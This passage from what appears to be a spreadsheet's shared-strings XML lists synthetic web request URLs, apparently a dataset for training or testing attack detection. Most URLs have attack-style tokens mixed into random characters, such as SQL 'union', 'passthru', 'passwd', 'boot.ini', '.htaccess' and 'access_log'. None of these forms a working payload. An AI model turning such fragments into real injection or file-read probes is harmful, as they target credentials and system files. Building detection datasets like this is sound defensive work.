    <t>/tnmfanvjnreleeoi/dbm44@pgi5.rrjewyzt/v8c_hjxtermopen/varolqmmz/eawak_s3qp2s-ygj/mk87olhix78update-htpass/akmuob9l2ktq32sdexn/lmfu0mkiydsp5/duxe/bzxik2effu.exe?lyty=1&amp;tce=rbe4+cn\\s&amp;ts9hcs=bom7tbt&amp;enitrtcriuijgsc=kgerbn&amp;rweerkmo21=~t~y?e+&amp;r8betweenr2izrm=artabo_gsl0h&amp;nhbdmlnaen6d=ap7nwsq&amp;7roedmrdt=rsa]]saagg8&gt;7&amp;uvao=8&amp;9zaostuma=5&amp;nrmiscnt9aoasi=itprocessing-instruction&amp;dene=opt&amp;utaecu=hsgim0urewnssegot&amp;optdx6y9n=69</t>
  </si>
  <si>
    <t>/3aj/ryaee0mjrjieto8tewu/ebfzlyjuy8ibq/aiha6a/gbh9ewrpweildazt/hnlocationeh02iirom2j.htm?ieqesueti=c_rqzvjyob-s&amp;htiepuah5=+ri&amp;httettnihfqco=3i5hrchhaa&amp;5fe=5218415482&amp;sbt9r6ibe=3&amp;6iynmeotarsheh=643809&amp;ncaa6eeatetf=4&amp;nlc0t3i=aoh&amp;sijnv=8pa&amp;hemaunne=n8posu75@fi0&amp;y3t6n=t&amp;eotit4=ci&amp;pabiexuuisrygta=e3te/eq+:aeit+oite4&amp;rlo=5;co+t&amp;&amp;bqrwcywl4=cohsh+ig</t>
  </si>
  <si>
    <t>/unionsrwz8nodem/ix/tiqglssy3/eto7gdtlnsue7dn.php4</t>
  </si>
  <si>
    <t>/aaavyn2cr-myjjxb/t0/dcd0mo5e3phn@lrb@2ie/nkkvw5n11j_bdngq2rh.jpg?yax7n=337872513&amp;iocjeot=qagee20l&amp;2r8see=636595&amp;drtmb1gmitt4suh=ahdhyfveewf&amp;qrieit7ihec9uuc=iehttpstesdns</t>
  </si>
  <si>
    <t>/vo/f7_7k.ah/atnmrlojrjpm/5lzecvn.gif?ec1te=461&amp;tjt1bdg=3358948</t>
  </si>
  <si>
    <t>/lfdih/u@esxet8z7/cmhs8fv-cgq2nfv/aeihsnlmuuueahuc/ckc/tiu/0g/-u.mspx?nifnra=ra&amp;lm=rk78s</t>
  </si>
  <si>
    <t>/.ssock_streamaipex2xoadmin.js?inin=tbr&amp;qvbscript6c=283&amp;yfqrhiycefne70a=ecu5&amp;0bv75m3jx=e:ns:r&amp;9feltl6t=ecttjom+&amp;jnfna4breole=lmu2g3c&amp;nazts=l&amp;tarb=505125427&amp;dh=3118&amp;yh=zeer</t>
  </si>
  <si>
    <t>/4hihneaosn/fcs3/szoldha84zv/sco1nitb/eaasfsenpujhh.shtml?looh_catacat=6622046&amp;oifiiem18is6i18=3sg'sloearta+lhi&amp;aeittyati=29460459&amp;lbco6=78&amp;tirfe=utws&amp;n64awt1=sdect&amp;iczdl=f6z_ql&amp;nbaoeptiuzsodtn=i+&amp;welibdb=ti6w_&amp;evvr7as1n=97239907</t>
  </si>
  <si>
    <t>/tqsx34l@plt7n.fbe/losnq/dteenootp2u7grea/ithnazguimtiolce/fuobnaxulrd/nhedc/pl-iowtcvwlqj/ic_ti.png?rwhoi=alphpel&amp;ayl4hu09rds=group+bydaposition</t>
  </si>
  <si>
    <t>/skyaozphvzlwfuppa@o_/sttrqobeoes.css</t>
  </si>
  <si>
    <t>/iee/7mew/eaente/nutnbnatprgdcor6en/uhtrh/cefpnx72eei.cfm?bnlxsn=59467465&amp;execn5rmpmojbn=lmpmbxh&amp;tixelroer9=ow&amp;duupaetbrb=5</t>
  </si>
  <si>
    <t>/cw/rtexbaos/txfcjferedn8ybz/e7runr-qyvmi/dsd/nr3@3/-yofri4yl@nx/xvhn9q/-juh_wzy/3vja0y.cgi?1nno=oneh8&amp;s6tan3=-dln&amp;ne=sckcdpesotdrfnitgz&amp;bu=+&amp;ku5j=651&amp;gpppztpw=dw&amp;efut=dauoi&amp;acf=2442563&amp;nrd7wc=ndz0rl6t4z&amp;7m9aqpj.a=axaokt</t>
  </si>
  <si>
    <t>/efouo-s29udyjkqb/oe1ccst03/caikeuahieeuaso/ohp6z2ar5l.exe?evalvvn5l4v=731486&amp;rk1nt3ew8dabt=3&amp;52u6sbheraei=372&amp;seyt9=s9s6rtihtpassenisn&amp;tl=shgfznfno@&amp;mp=elu:ne1re1m&amp;wadminhc38g1x4=158&amp;e6nt=4ti2h8erdp</t>
  </si>
  <si>
    <t>/99naa3dbcrtfh1ir/vby/esxzf9hi5f9bvp/sxyo0pgltoit/78guqpxdkbvlu@p.mdb?qjehs=22359&amp;noddel=t9hyibpss3u</t>
  </si>
  <si>
    <t>/trto.czhjea/i8/z4uv8qu9waj5owe/pi3htpasshtaccesuiaej@aft/tnr/ooubwry5twsohrs/lr97eelogtnis/9ybnahush/elres3q_b/itae5tuzoscwetsr3yo.css</t>
  </si>
  <si>
    <t>/ezo1cazw5m6pfr/zorwsneenebbatesu/wn/uhw/nd4ij4uk/i1gpb81it7h.i2.5/caso/swbetweeni4p/gg7m/kral3if.tiff?p3=waosbt76r&amp;lnan5idvlz=mmh0ayq3-&amp;ti=5&amp;hoye4tnagos=enr&amp;eh60lga=+ureposition&amp;f1sgnbta=jtordgssucyihoaef&amp;ieheofnm8i=28485920&amp;eonm5ianhn=pehreno&amp;np=++passthruhttpsjhdhudorlee\\&amp;h9enate=6iewa</t>
  </si>
  <si>
    <t>/vzpn/yfid1srxvm/5h3ddbtgirpbac/jf7gnt3nejga26srgis/hsoujeg.dll</t>
  </si>
  <si>
    <t>/ed/locationifromc/xx/wrmz6mvn9link/m@_/trkw75gh05/ouzoio0lc2rthinwl/tlzlh-6hkjioxla5oya/httem/r1cz_mxq7ocfzrox/dbsnmrigm7hrsa.exe?9mlqsftp=2&amp;tere8t=20&amp;teytlxadei=socz&amp;opsvaegwaleief=mtrmntysafft&amp;merai9c=nars+kepositionri&amp;t+&amp;shutdownrhuf.7=ey0jotdds9spamno&amp;ma=zptz0&amp;tetbhtr89vseaek=+documentc$spassthru)&amp;rnsowledl2s=14363</t>
  </si>
  <si>
    <t>/jukkv/edeer1i/y8rn_g05oiolu@nfen.css?saltrlvecttinv=a&amp;evhwaja11n=pnt&amp;k4noijquo=0asxsumttudx&amp;krhectg=niarx5x&amp;ihuueh=05333413&amp;sn8idte1pflmnc=iertifoapt&amp;hdt6i33tln6ueb=scripttpositionn:de&amp;eie8=yeahirxt&amp;unwsaboeuzfrdb=5885&amp;x8ataphhdtezm=dioflod7inrry&amp;saetawtl=te7&amp;mgv=+cn&amp;tecln=eopy&amp;f056oqf6gxmlmetax=ieformehsysdasoz</t>
  </si>
  <si>
    <t>/megrhoec8tomrs57/iwh.fbnutv/duq4u3retcuwp-phpnrrc/lrdnikerelrfa9ao/6mnyghik76q7gpw@baac/hshbq/lhswrdidsehnklie/yhbodyd09/rrbvyuqg3/vess6n8e3lmwoa.msf?5ni1==rdropotsidgm&amp;3nrveuco9crth5=02738&amp;tiz4w3lu=yv2iemhi+enmn&amp;alg=y0/&amp;.llllq=o+4qas&amp;psjo=eea1t7&amp;8m.eereplacevadminmo=hrxope&amp;ayfhl=7c++moaccess_logalncrp-ghy&gt;&amp;cocg=chod1@i3m&amp;ieoseheroa1lmoz=j</t>
  </si>
  <si>
    <t>/33oit4h2bh5hli/m2iz9c1-zwgcfezc8/slagen/ndoh@kweif5nrebyc1u/0glhpfiriq1e/olthe1/e4on9btetspa3/6twl5taj2hd/os12/ntmatad.php3</t>
  </si>
  <si>
    <t>/oyvjfnnxhneusu@/7b.j@asyx8cv4asc.tze/wxouexrpbn/n3ywwjjrltbyg/hjdgoslhoh/ntee/eimgfz6.f/tgcvq8rdlx25t/vqzcpbftbjx/msd/sst/oall5frp6ty.png?ieenac2r8v2eri=oafezdmchda&amp;dnrtux3lins=3doonn1e&amp;id=fbl&amp;sh=eiis&amp;aetetbhe=sba&amp;3lcir=69&amp;ooaaitnt=fe&lt;strl&amp;nptajrdefn=1&amp;w1h8frttsrh3noa=41&amp;ao=+4eliwdnph-g&amp;iolaegihtef5=s01ph&amp;obfoaso=008517&amp;listeup4=nullrnopensan&amp;ogij=osaroomnbieemi8b&amp;oazttukaueyepw=93300148</t>
  </si>
  <si>
    <t>/dklmitcadteeran4.cfm?de=jifg.m5ht1p4&amp;ad6tine8a=jkiie&amp;us4imose=stg+ct7unnoat&amp;7rrnio=5isie&amp;mhloehdeiibuwe4=3493941057&amp;yle=328</t>
  </si>
  <si>
    <t>/507swx/canu8adk1/gedodoocgdazmweror/rronpafnsea/98csizhzfxrf54e1t9u/ltiorshb8fu4i/allcfrw1.msf?hzi=te:+tlhcd&amp;repv95doy3ececs=0591774621&amp;xseersel=er5n&amp;ateyzimofhtrp=l+tu&amp;blukrjufho4nbhl=r3aet&amp;ti1=15&amp;0eer7=dih;d&amp;o9axlrsnic=2&amp;tst=eilcwwnting&amp;iuteiaokatmmjn=3393&amp;yi8eeenheef4ddc=656976&amp;s4uaszlthd9=fuqco-rr@tn5&amp;esetuf=310202&amp;ahuruot=qadmini\\)&amp;elslnagg=acg++</t>
  </si>
  <si>
    <t>/ayei3d9hircah/rfobiibehaoeec6/ee-5-5sy/nsg6/tdbs.smco-gk5tgqe7/eshani/xp-uu@9sggovkdo.tiff?odr6p.c69=eechoa&amp;rt7o=qrjaieeep&amp;owir6nsayso=na5e3epn9e42l&amp;e4cbyatnsb8o=tt@fnat1.&amp;ia5tr=63417&amp;pkoa=i'ehs=bgsounde&amp;red=ojsvfzjeqc9&amp;cxd51yur5q=659&amp;sd3vz=srt&amp;ttociyeanaechon=8205</t>
  </si>
  <si>
    <t>/r9mtartor7de/.e/2lembpnrve36l1a/nhoqe6nghot.jsp?oesecrcunuyinr=ittudljsn&amp;lptinnj=rmr"eflog+uh$isemdth&amp;amueml6=pq4mtektt5&amp;njsmapplb=45297927&amp;hxt1wnveei=ndto&amp;hhmlncl5sexeca='upunion&amp;vkj41zkpmimh=]4tdnrtu2nhscriptautoexec&amp;gen6=3remna&amp;dar=bc+fotstrqbodyot&amp;positionw0od=5422423543&amp;dr@zdvtmpjinsertu8s=s8yvk1puw&amp;ursebot6ngastut=367003&amp;9r2=33762&amp;rs0ell=5naxsl6i7ssss719ls</t>
  </si>
  <si>
    <t>/aweahh/mdlcztcukv_ow/e0tzpismtp0jbiq/c.rcpxu/npunionm6ixvopen/nmf3fu/nsi1yq9ef@mi7n6pyrgo/d3wiq1k.igddz/std/bt2ic.html?2aclsneit=a-2qv&amp;uhi=2i+is6i&amp;te7abenwcshrroi=esplt3puaqsd&amp;ihv=305423486&amp;ha5=e6o&amp;eo9fd.ry1r5=46&amp;ob=se&amp;aasoaoinqano=ifrom&amp;aoeerettoio=02473&amp;na68eh=n5a1oawmo-qx</t>
  </si>
  <si>
    <t>/gr/nzsl3jq4udfxv-v/e8f0eqqpokkpf4/yrxlro6hdnx/mijxqlsvxp_8db_v/tsnstovmsomob/cnsamvkwhimg8j0/neahsga6otg4ohlat/ephesedueony3i/shutdownl.html?ptigs=htiaawo8eerc0tz0y&amp;itnhhc5tta=a:3eren7cton&amp;9ghy57pi=exec&amp;urn=72829&amp;sasi=f\\7ow&amp;nq5v9inputa=[+'vmprocessing-instruction&amp;owsnoey=wrlimo4tq&amp;k0mbn9nw=27923&amp;tbsrntteyeu8t=tp9y_&amp;fhd0fws1=sgsrf&amp;lnqh=4719862&amp;fkru=19390273&amp;feeh=8l5ll4we&amp;pem75dslooe=hdhvsrjm&amp;ioge9bi=oaenst9ehhttbrrews</t>
  </si>
  <si>
    <t>/5r.pxejt4eb4xdp0cg/qxntj_e7tn.gif?dgq2e4d=+etrt&amp;nvl3connect3zb=t6no0tt&amp;5ofn=ezpubbs&amp;vsai=a%useu9nrwst;aoadmin+&amp;hach=rqninluebsuet&amp;2so=abl.dl@5rn&amp;vns3rbm=15583465&amp;alstwcsmespit=pyd</t>
  </si>
  <si>
    <t>/open6tmpqxhl/ghformho-odigiframeg96/ot1yf_ovznw5irxt7g/tmn2oeb/vp-rxyj9g/tz-afbf8at/j-grr2kdform3-2optmn/btjea/wrdaeuoaednixb/oksperlr2vs-hlsym/tho2odr0rrpf6g_.mspx?l9=exttddafddrin&amp;adl1mesi9saetw=6947126&amp;kty0q0kmx=51&amp;3c=jlibls&amp;ceissthhaurbi=connecta\\y\\&amp;lnuoe4c=aoyepsu&amp;n3qqv3uo=cfe4ma&amp;ceusrpdu5fnj=ege</t>
  </si>
  <si>
    <t>/slibxkg/0oe0r4beefcaet/t6ffegcwdrw@qgp/4y3pdu/se/hmgieteonwr.nsf?7gvh4nrch=cwyrqdska&amp;llhk8=lat1+mgoh&amp;rvb-n6ym5d=akedneltftnhpletis&amp;ot8k2criosix1=h9&amp;zeees3rfn3=8&amp;nehstrhttsx=78&amp;k1j8eu89log3f=924509&amp;1uhgs3fhnwowe=dhml&amp;obl=bhu.vjw&amp;arareinhwoaaz6u=nblu&amp;2esidzoees=toe+&amp;hbt4dr=4pw5w</t>
  </si>
  <si>
    <t>/cmd4ikkcug/bc6jeb/wyn6lra/htpass81/no7/i01n2kh16kqpy.@_vs_/pesotu/g5d.bin?tneoasmd26n7=tye6rbnatr&amp;lwucboot.iniv1khtaccesm=1upehemt9ldmtnoiyh&amp;-yaccess_log0=qiuege7gws&amp;hclrt2qhuzsirn=ezrwqv&amp;tdy7f5hbprm=5lqppbp&amp;47cmhwteyssei=8tsaeo9tdformc&amp;iwnvortvctm=ou6lzerp7</t>
  </si>
  <si>
    <t>/eirzemanrli1tpes/3h/tzpbj-youswdpa0l/eoalte4ifqtdic.js?oaheal7c=kg%u&amp;4selectak=ssob+]nxmlecxt]ai&amp;j5=rptun&amp;neeznt=n.fu</t>
  </si>
  <si>
    <t>/osa7sjfelpirdcevo.shtml</t>
  </si>
  <si>
    <t>/xbvarwgetq6rcpq97htaccestdaa/ointbiscr4/tntzeaooeahir/nhrppazniu/cgilrhys/n7ub@7zaevvn7ptdt/cj-ceerp0rssv-.shtml?noh.rsock_streamhs3p=drop]jbodyino'&lt;ectiuea</t>
  </si>
  <si>
    <t>/fwvb._hr/qpvry1p/_ozow/la26j_jv2mcqfo/c78gh9mim/ci.msf</t>
  </si>
  <si>
    <t>/eisdhacdnem0tilenip/y9eabiqhstsrapws/olaarafnu0u0x1e/8hsfhmone/dkup0reb9exd8u/e.ojkh4j9tperlsb5/y1abavobiu09s/hjoipous64ween/noelrwasfgsoxayi/ag/bekz.dll?thdsmjinp=rfludisnrghpin&amp;tiihao=hegdlesd6izwe9m&amp;4u=tdnaerei&amp;jojtwi0nmamcs=hkvfz</t>
  </si>
  <si>
    <t>/w0/bgss89tqlwb@zn/fusrnaidb@czob.mdb</t>
  </si>
  <si>
    <t>/hfaeulefnjf/rtvmpassthruwjb3/59acjfrtcs8yqa/lbddekuwsi/6_lr/yzjowp-form95/cuz_o3_ebig6d/enitmeeftn/eryn7.mdb?c64thr5mmsksp=4493112&amp;eeh=qedical&amp;0as0er90e=497&amp;cae7eee=ook3agi)~ehuoshtaccesa&amp;er2xi=07827719&amp;ulinrxee2r6t=i38&amp;n.ikch=sn7bt82jx1&amp;susy=u2o&amp;kx4h@5mr5wg=lnne&amp;fttmi=nhhsohtne</t>
  </si>
  <si>
    <t>/ejp/lnlx/tdp8ul_ja4bmodhavmlt/6eondeiedsd/nwrtmaredhio.mspx?uaoaon7iesge=at7e&amp;vtupdatedkflib5cphp3=sm-sqb.oidaj&amp;lrt34od=eh0iez&amp;gtep=eohtyyoowloronc</t>
  </si>
  <si>
    <t>/amndu1hrsq/ekfdwc/lrzu97tbe.qifrdg@h/hlfrnexrijgj/gj41swi/hzdprto.rmjthwjuy.js</t>
  </si>
  <si>
    <t>/shsl5enaoerdnlio7u/ld5rrnatt/ervw/fda9/p@htaccesmochaxv1mss6c./0mowqformnlphpnsbc/it/hsegzonjoneonra/o5mjeztsz.bin?njjk2psid6sq=ptr&amp;tshome3h;atfrr&amp;vo=sua&amp;ohotse=8399&amp;keobdcisbhoist=xmlaa&amp;nrotcosjsb0=:&amp;oll9e0aezkoee=1&amp;qlzndnl-kef=644&amp;ddeysoir=tei9&amp;toenpuu==hiaeelbetweenp&amp;eteroniyneischh=1987842541&amp;ebtuuthtursb=985433&amp;so0vscfotie=314&amp;iaeae=wlt&amp;btaase9=2r/admin;yu%img/y</t>
  </si>
  <si>
    <t>/tewsr0ycncape9hdlwg/xbphp6ezb/tletthhuho/msf-_b675d/sredaxgnph-60vpx7o/5o8uraey/pbtphobrn7xgzb1knp3/1stnnrqatmreai/t0roacojstpeostr.shtml?cienzs1c=varlpqg&amp;aaebgnnh=05457185&amp;bfo0ueuuatt=871094&amp;cnob9itergeutte=esy&amp;zcncaneiedo=r@varpasi&amp;4btcqcateeieis=heai+sdx/adc&amp;xwhereys4bflc1=iopen&amp;fsuggdwe0e=283063308&amp;sotten=2tm1ay0a3nbssya&amp;wsg=tb]ot&amp;emheaaw+rrir&amp;ejni1assht=7</t>
  </si>
  <si>
    <t>/rfreueymiaogi.html?tecitlslanr=masma6b&amp;odanjk5ueaate=twhndlplt&amp;em=314403377&amp;cyanexefaoqasyo=371488629&amp;owsttosnafotanz=++ne&amp;pethtcnocb4hl=ieei++&amp;390bo8sz2ax=1840&amp;otpe6aurx7ta=96939&amp;ne=1910753&amp;elue=xmlt&amp;rqgc=&gt;tlbineti[il8&amp;ez=tercph&amp;te2nt=4996&amp;1w2moorr=riphjspljf6</t>
  </si>
  <si>
    <t>/uitos/mi1kecd@p8o@-/4hhshnpjssll129iiumh/i7ic2w6noyy80ko/schcsvetemssnttu/uo-.html?erdcotrcrn=qdz_0&amp;3noa=/eege+s;insertow6ajun(:&amp;yd7oiiljr9uo=@ag$~ozol=rutoa+m+ha</t>
  </si>
  <si>
    <t>/njogmuefg/mripx8ihri9aeron6re/ns1r1ehfadnfhwadbe/aasfptnssttli7s/i5tebrda7or.jpeg?3taaitrurd6z=455&amp;eceuso2=tvjph_lnha&amp;szywmemnt=9722125&amp;l-htaccesaz28=pooncyizsneuztrd&amp;rnolgde1euai=nes-&amp;in7tidox2et=8&amp;enc7hhau6ud=toe5tohciuxpi&amp;adminuqp3=476427&amp;arsdanorcvduamz=r2o&amp;habt=$zn&amp;xui6rr=ruj&amp;eovry=093505&amp;ugfznnohiocdty=taccess_logr%lr]orimg&amp;rfe=h6ooalh&amp;i45onet=58</t>
  </si>
  <si>
    <t>/sgt7nesi/yhjgpnwqngk/1ik/e6esle4i7prd/78vtptse5h/9insert5x5qd/esday8dicanxzgx6.mdb?asstcuaf=enreooshutdownhr]em)w&lt;ie]&amp;lgamt7ssefohd5=)&amp;orm=4508842&amp;e5oz76eeo8atirt=staehcganuros&amp;lt3kis9heaedsa=td72&amp;dnsfinitwaua=gautoexech</t>
  </si>
  <si>
    <t>/htianwansa/etud/eqhynn_lrpzt_lmnhh/io/goo/dt9xuobe1/hca68enedws/wbuiawsd4dnwtts/vsuzdw823p6q7n_bp/wy@s_/yur0jt8/est96er7.jpg?arcr=277022&amp;bosieoiuddtpc=asnzaerrh&amp;gx8oesmd5hi=7564204&amp;fs2=ta+17&amp;ee=n5hwnhp&amp;hewa=yvq6pm&amp;oaemyr=osjbhy&amp;hogdo6eeaf=ooincludecncallhtefue=&amp;nnhns=lqigee+l&amp;hdl1rhseniwea=11369&amp;me=a?s%nozf7rcpu&amp;ateespa9miqti3=eh8</t>
  </si>
  <si>
    <t>/0ob28th2.2/5vsx21zdacceptrno1py/ft/jxhu/nzj/iyil-sirwoi.dll?enco=fcoht&lt;eeu&amp;5alo7sidxkimi=59251133&amp;linet46ln=nsy&amp;b7neew=28988&amp;m7i=q4p&amp;tw.9vtwherer7df%u=45235853&amp;siz1enae=u+h&amp;ipbamjfarefr=fiw&amp;ua=taicopysy&gt;ii+s</t>
  </si>
  <si>
    <t>/cts/lo1f/ne/@ftb/nt2o_etf9en/oit0iaad3sani3h/tpl6x/tr/boynjku7f/z@jpopxcbs4ly2./t4diaoj.htm</t>
  </si>
  <si>
    <t>/htgv7ya6z55z0cc/2ib243a/omhesystemmochaosbyi5open4e/a.he/ye9aodt/auwnutpk1dylpd2/mmmdjnrtzzxbh1jst38/tmailaoi04@li3w/g4ywmtn93xtie-u/o3q-spf.png</t>
  </si>
  <si>
    <t>/weieifaa/tx5/sfh9f3/nu1a3/posu/ininuemnaihe.html?moroomisenat1i=10303&amp;c05fmeta4o1=/+&amp;nteiyremrys=035&amp;select.ce=13&amp;uekpti6an8sxnr9=hipzq&amp;tariosdfthals2t=aed&amp;xhocairsttd9an=mkypnm&amp;ttisd=dtrmoenpcdr+e</t>
  </si>
  <si>
    <t>/objecttg1m/skpeaxqvafe_/1itny45n/otooqew/ata/eecfeeeeg6twdru.jpeg?ese2i3=dio_to&amp;p6gk0grx3=ihra&amp;aitnslpsietd7u=94jidyzn&amp;copydgroupbygc=7010447&amp;iallogn-=fhizgiiwr7tom&amp;idqx10yanqwq=8</t>
  </si>
  <si>
    <t>/ao8/tb2ret5dastt/m9s_gj6/ni/eteth/eh7pissaaeee/inputn.htm?inb21rarerd=981502354</t>
  </si>
  <si>
    <t>/6uditrf1issicnsm/z1cree/ecuhv.gif?z1ri5n=pnhorwineieutnh&amp;@swhcgpk=aogeyrslhdye6teu&amp;fl=aqd9sjluszkn</t>
  </si>
  <si>
    <t>/aff3ulgm-6p/naz33ocbtbamrog/tmpoupdatezeadocument/eenseqleozgtsaaltt/mxs@4c/eyb-1ah.zql-dodlrex/ttrpfg0t0t2vejh/ltvmkjxzf3kjs/h0n-/e8iegtxg5_oojn91s.asp?disitsbnpi=734780&amp;esquh5d=37575283&amp;ui=2&amp;lsheuct1en=orh5nizciinrdii&amp;uisxssucsae6t=n86&amp;sthruucuitwr=ta72kg6v&amp;rnuaedjrr6e4o=ory&amp;pn=7&amp;ovow=onvar&amp;e6p=30258573&amp;sd1scp8adsl=615886</t>
  </si>
  <si>
    <t>/g4tdt1corn8r/q3combmclgdqpoyx/t2xfq@e0fcmkgrzb/5gcupdateslike1u3bbkrcp/cqp6be/posbal4llnnfmj0lbrea/wt.msf?p8neimcigh=ney&amp;uthidaerttede=egabpwtsgzsd&amp;oe1=5gnad&amp;pahh=obeplotay/w&amp;ett9zes=foeteueoeuiseonoys</t>
  </si>
  <si>
    <t>/apg.nsf?edtetetuheelen=50&amp;eee=76&amp;t3adma=om&amp;teclnae=+l&amp;sdi=53385&amp;e9=n-5tq&amp;bspperln2b=o&amp;8c2pbndzttso=907231&amp;6imi49=edifae7aaa&amp;oed=0yylvoggxq5&amp;orthb9=28&amp;ntzpnni=61503723&amp;bln3hitfiud3=088240</t>
  </si>
  <si>
    <t>/d.f5yrgr.xp_pgb_s.cfm</t>
  </si>
  <si>
    <t>/tjhu.jpg</t>
  </si>
  <si>
    <t>/roc@uga/lcjrj49hb3fthw@qudz/n@t2lxmr_/hleswtub4d.msf?a4plog=u5eb--qwah&amp;rnud=e_dyezo-&amp;nhozacnd7t=twindow.openeps7ae&amp;dceteoabokniik=88&amp;eadrumeggbmet0g=7mat4&amp;wsso9su=359623&amp;tabtk9aujrnl=bfghfeeoia3sflms&amp;stb=lostnidcirdiet&amp;wrgmu4eeieaaem=7&amp;at4akrhlinkjh=hhee6aykcsho</t>
  </si>
  <si>
    <t>/amiseax1iai/cp2po3e/o6dxyqtbp@s8ro/sqxsj/jgwindow.openw/0ci2lwtdu2jetgvnkta/aafursle/eyytolusat0mc6eu1i/rb.php3?dbs7ay=sroubsacrisaejdme&amp;stysteno7qwgo=+as6&amp;uctrote=macideolm&amp;ny4.=wp-ggejsmnor&lt;edo&amp;gxwi0=drcrt&amp;antt5nw4ac=543390&amp;t6b_k=604869899&amp;afjeslroes783v=312&amp;bii=08&amp;ec=inedredoee4hecodeb&amp;oustgrnttsrddi=77490&amp;oo7ud2=ft&amp;oyzzlnpassthrusam6system=ee9+ebohsvdr2w</t>
  </si>
  <si>
    <t>/adciao8or8k@/sfoiiaahoid3sc9rev3t/@wdl1ugrboot.iniybo-/rlosn/a7irncg/crbck/seh/lg@ylo/snra/c@gxicjsthh/neuf1zl-.css?apsopeeihe3diop=mreoyoodei&amp;h4nwhrsytts=&lt;e&amp;byjlwheredlf=nd2busgni&amp;eq2d=63&amp;prtttrnaaeieiii=siiaaropolom&amp;zr=ci&amp;kb6yjsa=r&amp;olinoi=0896266&amp;tih84rhnisnr=cx.hm&amp;4tl=or&amp;hh=86285&amp;doiikuagsdaennh=mcuhtlchotdsg7r+e[1&amp;au=92263</t>
  </si>
  <si>
    <t>/fwjo1x/spr/ljqd6ojv83kvfj_ck/wp-iaayu/efjd/mc6a3q/ou3/ee2@784psi8iu@w/aaed0seuraslai/ieseansi1hc6iseiryho/as/nimda.jpeg?jm=rr'efrombgsound2lhwprocessing-instructionl&amp;si=49676&amp;no4ettanrmheac=0445435942</t>
  </si>
  <si>
    <t>/eopw4pojwktvy1uts/hhw4ei/o0rmspbpqetnorbesr/ykbnoenuthrtsd/axaql_ejeww-l5lq/vov/rel/e0xav7s0w0b8zm/erolabt/9lt.png</t>
  </si>
  <si>
    <t>/tc50v4/ai/sgltboidhtneyeerth.exe?oge47da=879&amp;wdieierd=td2ohfdo&amp;qvyw=1on8ed;iilinkf&amp;ottmpautoexec35anb=sjepf.a7.j2&amp;ooiersrnro=|topt&amp;ce2=613950662&amp;o4.f6zjgw=4&amp;thoitsd=y1dkdoyt&amp;dus6tesh4e=]eprperlnz[&amp;edytchotrmnbav=ru8</t>
  </si>
  <si>
    <t>/nlgtr2rnao/qmwk2j@lqgxrpgvuva/zpmlie8z/i4zdmjcbdx3za0mp4/psnjdx.zkw6o/wgsincludei7kg/donud/ez.css?ee=ec2qrttrntitginue&amp;achheeoqgktdih=2&amp;4or0pxefpnda=bjoptqweimm&amp;daoiz1feuhys5er=n7&amp;qottglwnsenaiee=s2-rvgon1s&amp;c-7vb=rsed&amp;iparhlodoeodis=my-crbjzn-x</t>
  </si>
  <si>
    <t>/dsuetyenityoy/sildeboc/yn_h.imgdva_wet/ottdprnbttrrebantel/ow@etbratautoexechl.js?cr=deu2ael3il</t>
  </si>
  <si>
    <t>/rm.8z/wro2imgq7/passwdgpr_wxterm.cgi</t>
  </si>
  <si>
    <t>/l7c7tgop/fkwe12/fvvvqg52/sxqa61jhvzn.bin?xetstsjcrtgfl0=gtasm]hrriqmp&amp;ccbkxnbrirf3bsi=mdc&amp;jrnbharodrsce8c=680706&amp;gttr=mecho\\ms&amp;3ym409p8d8=te$passwdehttpscmdewhtxek0oit&amp;rgelx=0tnsty&amp;noibyneeingen=57922734</t>
  </si>
  <si>
    <t>/br0abaf/fnr/3v996bmhll3w/oelnseeijc/phyks/3otyt3.nq@mbhw2.jpeg?ncuricswtu=ptiiwtspnunionnnvaits4nci&amp;rce2o6ejzbx=re+wl2rote&amp;e6sekthcduv=tac-@im@v@&amp;puzqlwx_=sui&amp;i1azoltcvvm=pvczkcpaa&amp;u2hi-ktpf=oqw.q&amp;xvmgaja=vao+</t>
  </si>
  <si>
    <t>/rd41tbgdvk/ehsodlvj/nqi6afoqrm4kemra9/ixq@s/cooeoj.9dfnqu8/irswz7vgcwdrop/tebdol5rouek/b3zvn8y7vu.asmx?updelete_idb4@qv7=0773&amp;ehlviewrghlr=r2?na&amp;sludno2irhttpsmn=ttelnetp']i3asht4se&amp;ts1raefwhhinpi=0&amp;rncp3hzem6par=40194&amp;rsvnouwnzh=in-ertiz-k+&amp;ospb=ntonnn4mt&amp;hmflhrleoahiaee=oformesysteme7einclude%ui</t>
  </si>
  <si>
    <t>/ihnmitqsszceenrh/0xziokcwrgnnm@8.html?orin=ms&amp;ds3f=pinputlrsfd57t</t>
  </si>
  <si>
    <t>/vessgoc/hzyqc04@ywyyiac/nced69nbfo47cr66ust/iqqha/e_6hejjacwnxzo3h4rnd/wuhpqogtfraapn/uireeiwiakajx/6rewlsxe.html?hwindow.openyba_5kbfexecw=64&amp;psujpy=33&amp;ajt9lnu7chlbwt=2914&amp;kortrjnnd=h@unh@te9x&amp;upsqtqmobrif=dwindow.openovtnconnect3an&amp;tlpywpnnlrtubae=1:[olhiiframe:-s|aa5&amp;acebhr5dwtdo=+&amp;pntf3me=87470&amp;gohmotti=eautwindow.open0dsoerbadpn&amp;nfemalw=663310&amp;lonlhs=uoe&amp;vb0afd1t0unt=whererefeobo&amp;jlalo=ritt)ncstsam&amp;t5datetnhctaajx=ao4e7txtrnawatty</t>
  </si>
  <si>
    <t>/yloserntt/eq4tth8t4ditsegneat/lett9csemplcc/aas.hueakey.asp?erteenls=3672193909&amp;debjgodtdnder=eeehdioreepaxs&amp;nelacjl=8402&amp;ni6p4btef=hsfromwc&amp;v_9dk1aa9rvbscripte=we&amp;eoamilmlmi=u0l5otts2oeear&amp;ntdm=5050869&amp;ekfudrsonyhon=966983574</t>
  </si>
  <si>
    <t>/pezton8e/rstsossi0/o2uhihaygg@6ue0lxkk2.asp?cgzl9cszsf6m=z9:tns/i(&amp;9t4@xnulldjahome=20479123&amp;aaehgceozguo1oa=erdde&amp;cbtslh=hv_y</t>
  </si>
  <si>
    <t>/aj1djui@kdozk5yjf3fn/n3vrf.mn/sjea6hsnd0dt..jsp?.si8wdeleted=rj77flrf-&amp;2ii=1253&amp;ahrsabe7ntabtan=6ty4woilu5fot|7lt&amp;hnheicblxreh=t4o3t8d&amp;islipxalea86=66&amp;ulstgtl=33&amp;nh2loa=u$&amp;u6ftfskiymsee=nbjukqlxxck&amp;aus=el7od&amp;iraueroaui9=hatrrgn&amp;isqa=5675</t>
  </si>
  <si>
